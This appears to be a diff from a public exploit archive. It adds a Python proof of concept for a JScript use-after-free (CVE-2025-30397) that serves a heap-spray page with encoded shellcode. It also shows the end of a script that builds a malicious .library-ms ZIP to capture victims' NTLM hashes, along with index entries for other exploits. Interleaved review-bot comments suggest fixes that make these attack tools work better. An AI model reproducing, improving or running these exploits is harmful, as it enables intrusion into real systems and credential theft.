output_dir.mkdir(parents=True, exist_ok=True)
print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
library_file = create_library_ms(args.ip, args.name, output_dir)
zip_file = output_dir / f"{args.name}.zip"
build_zip(library_file, zip_file)
if not args.keep:
library_file.unlink()
print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")
print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")
if __name__ == "__main__":
main()
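Review bot: `create_library_ms` takes a `filename` argument but never uses it — the output path is the fixed `f"(unknown).library-ms"` literal — so the `-n/--name` option only influences the ZIP name; the rendered literal may be an extraction artifact, but as shown the parameter is dead and the intent was presumably `output_file = output_dir / f"{filename}.library-ms"`. `is_valid_ip` accepts any dotted quad of 1–3 digit groups, e.g. `999.999.999.999`; `ipaddress.ip_address(ip)` from the standard library inside a `try/except ValueError` validates the value properly and makes the IPv4/IPv6 decision explicit. The `colorama` import is a third-party dependency that is never initialised with `colorama.init()`, which matters on older Windows consoles; either document the dependency next to the import or drop the colouring.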

108
exploits/windows/remote/52315.py Executable file

@ -0,0 +1,108 @@
#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE)
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.
# ============================
# Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
# $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
# Open Internet Explorer and navigate to:
# http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================
import http.server
import socketserver
PORT = 8080
HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>PoC - CVE-2025-30397</title>
<script>
var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
while (payload.length < 0x1000) payload += payload;
var shell = unescape(
"%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
"%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
"%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
"%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
"%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
"%u0065"
);
var final = payload + shell;
var buffer = [];
for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
var sprayTarget = document.createElement("iframe");
sprayTarget.setAttribute("src", "about:blank");
document.body.appendChild(sprayTarget);
for (var i = 0; i < 200; i++) {
try {
sprayTarget.contentWindow.eval("var a = '" + final + "'");
} catch (e) {}
}
for (var j = 0; j < 1000; j++) {
var obj = document.createElement("div");
obj.innerHTML = "EXPLOIT" + j;
document.body.appendChild(obj);
}
var victim = document.createElement("object");
victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
document.body.appendChild(victim);
alert("PoC loaded. If vulnerable, calc.exe will launch.");
</script>
</head>
<body>
<h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
<h2>Author: Mohammed Idrees Banyamer</h2>
<h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
<h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
<p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""
class Handler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", str(len(HTML_CONTENT)))
self.send_header("X-Content-Type-Options", "nosniff")
self.send_header("X-Frame-Options", "SAMEORIGIN")
self.send_header("Content-Security-Policy", "default-src 'self'")
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
self.wfile.write(HTML_CONTENT)
else:
self.send_error(404, "File Not Found")
def run():
print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
with socketserver.TCPServer(("", PORT), Handler) as httpd:
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nServer stopped.")
if __name__ == "__main__":
run()
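Review bot: `Handler` subclasses `http.server.SimpleHTTPRequestHandler`, so while `do_GET` is overridden the inherited `do_HEAD` still maps request paths onto the server's current working directory; deriving from `http.server.BaseHTTPRequestHandler` instead keeps the server limited to the single in-memory page it is meant to serve. `socketserver.TCPServer(("", PORT), Handler)` in `run` hard-codes a bind on every interface with no `allow_reuse_address`, so a restart within TIME_WAIT fails with "Address already in use"; consider `socketserver.TCPServer.allow_reuse_address = True` before the `with` and making the bind address a parameter of `run`. The `Content-Security-Policy: default-src 'self'` header sent alongside an inline `<script>` is contradictory — a CSP-enforcing browser blocks that script, and the IE11 target named in the header does not enforce the header at all — so it should either be dropped or carry a comment explaining it is intentionally inert.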


@ -5550,6 +5550,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33254,exploits/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting",2009-09-23,IBM,webapps,java,,2009-09-23,2014-05-09,1,CVE-2009-3469;OSVDB-58320,,,,,https://www.securityfocus.com/bid/36513/info
31438,exploits/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,webapps,java,,2008-03-19,2014-02-06,1,CVE-2007-4592;OSVDB-43356,,,,,https://www.securityfocus.com/bid/28296/info
36299,exploits/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",webapps,java,,2011-11-11,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50646/info
52304,exploits/java/webapps/52304.py,"Java-springboot-codebase 1.1 - Arbitrary File Read",2025-05-25,d3sca,webapps,java,,2025-05-25,2025-05-25,0,CVE-2025-46822,,,,,
36971,exploits/java/webapps/36971.txt,"JavaBB 0.99 - 'userId' Cross-Site Scripting",2012-03-18,sonyy,webapps,java,,2012-03-18,2015-05-09,1,,,,,,https://www.securityfocus.com/bid/52545/info
36828,exploits/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,webapps,java,,2012-02-17,2015-04-27,1,,,,,,https://www.securityfocus.com/bid/52060/info
37033,exploits/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Cross-Site Scripting",2012-04-02,"Dawid Golak",webapps,java,,2012-04-02,2015-05-17,1,,,,,,https://www.securityfocus.com/bid/52845/info
@ -9267,6 +9268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,,2019-11-22,2019-11-22,1,,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1929
47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,,2019-09-19,2019-09-19,0,,,,,,https://github.com/A2nkF/macOS-Kernel-Exploit/tree/81765a91cd299b6c05fd3edf7afe557405c949fa
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,,2020-05-12,2020-05-12,0,,,,,,
52316,exploits/macos/local/52316.py,"macOS LaunchDaemon iOS 17.2 - Privilege Escalation",2025-06-05,"Mohammed Idrees Banyamer",local,macos,,2025-06-05,2025-06-05,0,CVE-2025-24085,,,,,
43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,0,,Local,,,http://www.exploit-db.commurus-1.4.11.zip,https://m4.rkw.io/blog/murus-firewall-1411-escalation-hihack--root-privesc.html
41854,exploits/macos/local/41854.txt,"Proxifier for Mac 2.17/2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",local,macos,,2017-04-11,2017-04-12,0,CVE-2017-7643,Local,,,,https://m4.rkw.io/blog/cve20177643-local-root-privesc-in-proxifier-for-mac--218.html
41853,exploits/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,local,macos,,2017-04-11,2017-04-11,0,,,,,,https://www.securify.nl/advisory/SFY20170401/multiple_local_privilege_escalation_vulnerabilities_in_proxifier_for_mac.html
@ -10425,6 +10427,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,,
11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,,
51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,,
52306,exploits/multiple/local/52306.txt,"ABB Cylon Aspect Studio 3.08.03 - Binary Planting",2025-05-25,LiquidWorm,local,multiple,,2025-05-25,2025-05-25,0,CVE-2024-13946,,,,,
38835,exploits/multiple/local/38835.py,"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation",2015-12-01,rebel,local,multiple,,2015-12-01,2018-11-17,1,CVE-2015-5287;CVE-2015-5273;OSVDB-130747;OSVDB-130746;OSVDB-130745;OSVDB-130609,,,http://www.exploit-db.com/screenshots/idlt39000/screen-shot-2015-12-03-at-40702-pm.png,,
30666,exploits/multiple/local/30666.txt,"ACE Stream Media 2.1 - 'acestream://' Format String",2014-01-03,LiquidWorm,local,multiple,,2014-01-07,2014-01-07,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
19139,exploits/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",local,multiple,,2012-06-14,2012-06-14,0,OSVDB-81754;CVE-2012-0780,,,,,
@ -10568,6 +10571,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772
52190,exploits/multiple/local/52190.py,"qBittorrent 5.0.1 - MITM RCE",2025-04-11,"Jordan Sharp",local,multiple,,2025-04-11,2025-04-11,0,CVE-2024-51774,,,,,
52289,exploits/multiple/local/52289.txt,"RDPGuard 9.9.9 - Privilege Escalation",2025-05-13,"Ahmet Ümit BAYRAM",local,multiple,,2025-05-13,2025-05-13,0,CVE-n/a,,,,,
21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info
47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,,2020-11-27,2020-11-27,0,,,,,,
@ -10585,6 +10589,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22732,exploits/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",local,multiple,,2003-06-05,2012-11-15,1,CVE-2003-1123;OSVDB-15151,,,,,https://www.securityfocus.com/bid/7824/info
9973,exploits/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Local Privilege Escalation",2009-10-17,prdelka,local,multiple,,2009-10-16,,1,CVE-2009-3692,,,,,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,,2020-12-09,2020-12-09,0,,,,,,
52292,exploits/multiple/local/52292.c,"TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow",2025-05-13,"Mohamed Maatallah",local,multiple,,2025-05-13,2025-05-13,0,CVE-2024-11237,,,,,
19551,exploits/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
19552,exploits/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",local,multiple,,1997-02-13,2012-07-03,1,CVE-1999-0041;OSVDB-1109,,,,,https://www.securityfocus.com/bid/711/info
11789,exploits/multiple/local/11789.c,"VariCAD 2010-2.05 EN - Local Buffer Overflow",2010-03-17,n00b,local,multiple,,2010-03-16,,1,OSVDB-63067,,,,,
@ -10607,6 +10612,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
52293,exploits/multiple/local/52293.bash,"Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation",2025-05-18,"Marco Ivaldi",local,multiple,,2025-05-18,2025-05-18,0,CVE-2025-1731,,,,,
32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@ -10616,6 +10622,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22327,exploits/multiple/remote/22327.txt,"3Com SuperStack 3 Firewall - Content Filter Bypassing",2003-03-05,bit_logic,remote,multiple,,2003-03-05,2012-10-28,1,,,,,,https://www.securityfocus.com/bid/7021/info
31921,exploits/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal",2008-06-16,"Tan Chew Keong",remote,multiple,,2008-06-16,2014-02-26,1,CVE-2008-2822;OSVDB-46155,,,,,https://www.securityfocus.com/bid/29749/info
32167,exploits/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,remote,multiple,,2008-08-05,2014-03-11,1,CVE-2008-3494;OSVDB-47517,,,,,https://www.securityfocus.com/bid/30541/info
52305,exploits/multiple/remote/52305.py,"ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation",2025-05-25,LiquidWorm,remote,multiple,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
52317,exploits/multiple/remote/52317.txt,"ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)",2025-06-05,LiquidWorm,remote,multiple,,2025-06-05,2025-06-05,0,CVE-n/a,,,,,
25019,exploits/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,CVE-2004-1256;OSVDB-12426,,,,,https://www.securityfocus.com/bid/12019/info
25018,exploits/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",remote,multiple,,2004-12-15,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12018/info
32382,exploits/multiple/remote/32382.txt,"Accellion File Transfer Appliance Error Report Message - Open Email Relay",2008-09-15,"Eric Beaulieu",remote,multiple,,2008-09-15,2014-03-20,1,CVE-2008-7012;OSVDB-48242,,,,,https://www.securityfocus.com/bid/31178/info
@ -10736,6 +10744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9994,exploits/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",remote,multiple,,2009-11-08,,1,,,,,,
9995,exploits/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",remote,multiple,,2009-11-08,,1,,,,,,
27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",remote,multiple,,2006-01-16,2013-07-25,1,CVE-2006-0254;OSVDB-22458,,,,,https://www.securityfocus.com/bid/16260/info
52318,exploits/multiple/remote/52318.py,"Apache Tomcat 10.1.39 - Denial of Service (DoS)",2025-06-05,"Abdualhadi khalifa",remote,multiple,,2025-06-05,2025-06-05,0,CVE-2025-31650,,,,,
20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple,,2000-07-20,2012-07-31,1,CVE-2000-0759;OSVDB-674,,,,,https://www.securityfocus.com/bid/1531/info
33379,exploits/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,remote,multiple,,2009-09-02,2014-05-16,1,,,,,,https://www.securityfocus.com/bid/37149/info
21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple,,2002-05-29,2017-07-11,1,CVE-2002-2007;OSVDB-13304,,,,,https://www.securityfocus.com/bid/4878/info
@ -10788,6 +10797,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info
52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,,
22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py
@ -10863,6 +10873,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9039,exploits/multiple/remote/9039.txt,"cPanel - (Authenticated) 'lastvisit.html Domain' Arbitrary File Disclosure",2009-06-29,SecurityRules,remote,multiple,,2009-06-28,2016-12-30,1,OSVDB-55515;CVE-2009-2275,,,,,
21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0787;OSVDB-9240,,,,,https://www.securityfocus.com/bid/4717/info
21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple,,2002-05-10,2012-09-22,1,CVE-2002-0786;OSVDB-14438,,,,,https://www.securityfocus.com/bid/4718/info
52295,exploits/multiple/remote/52295.py,"CrushFTP 11.3.1 - Authentication Bypass",2025-05-18,İbrahimsql,remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-31161,,,,,
52012,exploits/multiple/remote/52012.py,"CrushFTP < 11.1.0 - Directory Traversal",2024-05-13,"Abdualhadi khalifa",remote,multiple,,2024-05-13,2024-05-13,0,,,,,,
38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",remote,multiple,,2012-11-07,2015-11-05,1,CVE-2013-2261;OSVDB-95000,,,,,https://www.securityfocus.com/bid/61090/info
38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",remote,multiple,,2015-11-07,2015-11-05,1,CVE-2013-4103;OSVDB-95007,,,,,https://www.securityfocus.com/bid/61093/info
@ -10929,6 +10940,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@ -10990,6 +11002,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19903,exploits/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",remote,multiple,,2000-05-05,2012-07-17,1,CVE-2000-0381;OSVDB-306,,,,,https://www.securityfocus.com/bid/1178/info
39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2018-01-11,1,CVE-2014-5380;OSVDB-110460,,,,,https://www.securityfocus.com/bid/69390/info
39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",remote,multiple,,2014-08-26,2016-01-22,1,CVE-2014-5381;OSVDB-110456,,,,,https://www.securityfocus.com/bid/69390/info
52303,exploits/multiple/remote/52303.py,"Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow",2025-05-25,Pepelux,remote,multiple,,2025-05-25,2025-05-25,0,CVE-2022-2070,,,,,
52313,exploits/multiple/remote/52313.py,"Grandstream GSD3710 1.0.11.13 - Stack Overflow",2025-06-05,Pepelux,remote,multiple,,2025-06-05,2025-06-05,0,CVE-2022-2025,,,,,
33203,exploits/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",remote,multiple,,2009-09-02,2014-05-06,1,CVE-2008-6992;OSVDB-48910,,,,,https://www.securityfocus.com/bid/36209/info
38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,remote,multiple,,2012-11-23,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/56662/info
31912,exploits/multiple/remote/31912.txt,"GSC Client 1.00 2067 - Privilege Escalation",2008-06-14,"Michael Gray",remote,multiple,,2014-04-09,2014-04-09,0,CVE-2008-7170;OSVDB-53482,,,,,https://www.securityfocus.com/bid/29718/info
@ -11076,6 +11090,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43385,exploits/multiple/remote/43385.py,"Intel Active Management Technology - System Privileges",2017-05-10,nixawk,remote,multiple,16992,2017-12-21,2018-01-08,0,CVE-2017-5689,,,,,https://github.com/nixawk/labs/tree/d7e879222d058f8b87b7681342834470ab4ba536/CVE-2017-5689
38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",remote,multiple,,2013-07-02,2015-11-05,1,CVE-2013-4786;OSVDB-95057,,,,,https://www.securityfocus.com/bid/61076/info
22462,exploits/multiple/remote/22462.txt,"Interbase 6.x - External Table File Verification",2003-04-05,"Kotala Zdenek",remote,multiple,,2003-04-05,2012-11-03,1,,,,,,https://www.securityfocus.com/bid/7291/info
52294,exploits/multiple/remote/52294.php,"Invision Community 5.0.6 - Remote Code Execution (RCE)",2025-05-18,"Egidio Romano",remote,multiple,,2025-05-18,2025-05-18,0,CVE-2025-47916,,,,,https://karmainsecurity.com/pocs/CVE-2025-47916.php
22662,exploits/multiple/remote/22662.txt,"iPlanet Messaging Server 5.0/5.1 - HTML Attachment Cross-Site Scripting",2003-05-27,KernelPanikLabs,remote,multiple,,2003-05-27,2012-11-13,1,OSVDB-4637,,,,,https://www.securityfocus.com/bid/7704/info
21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple,,2002-07-09,2012-09-29,1,CVE-2002-1042;OSVDB-846,,,,,https://www.securityfocus.com/bid/5191/info
